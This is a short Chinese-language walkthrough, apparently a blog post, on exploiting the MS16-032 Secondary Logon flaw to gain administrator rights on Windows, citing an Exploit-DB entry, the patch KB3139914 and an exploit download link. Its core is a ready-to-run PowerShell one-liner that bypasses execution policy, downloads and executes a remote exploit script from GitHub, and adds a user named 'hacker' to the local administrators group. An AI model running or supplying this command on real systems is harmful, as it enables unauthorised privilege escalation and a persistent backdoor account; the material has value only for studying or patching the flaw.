exploit-db的詳情: https://www.exploit-db.com/exploits/39574/
Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege
0x01使用標准用戶登陸win7,下圖是當前登錄用戶abc的詳細信息。
0x02直接執行命令進行提權,簡單粗暴
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

0x03下面就是見證奇跡的時刻了

該漏洞危害十分嚴重,如圖在2008server上測試

本地測試如圖,被安全軟件檢測到。

微軟官方在2016年3月8日發布了補丁KB3139914。
附上利用提取文件下載地址https://github.com/hexx0r/CVE-2016-0051
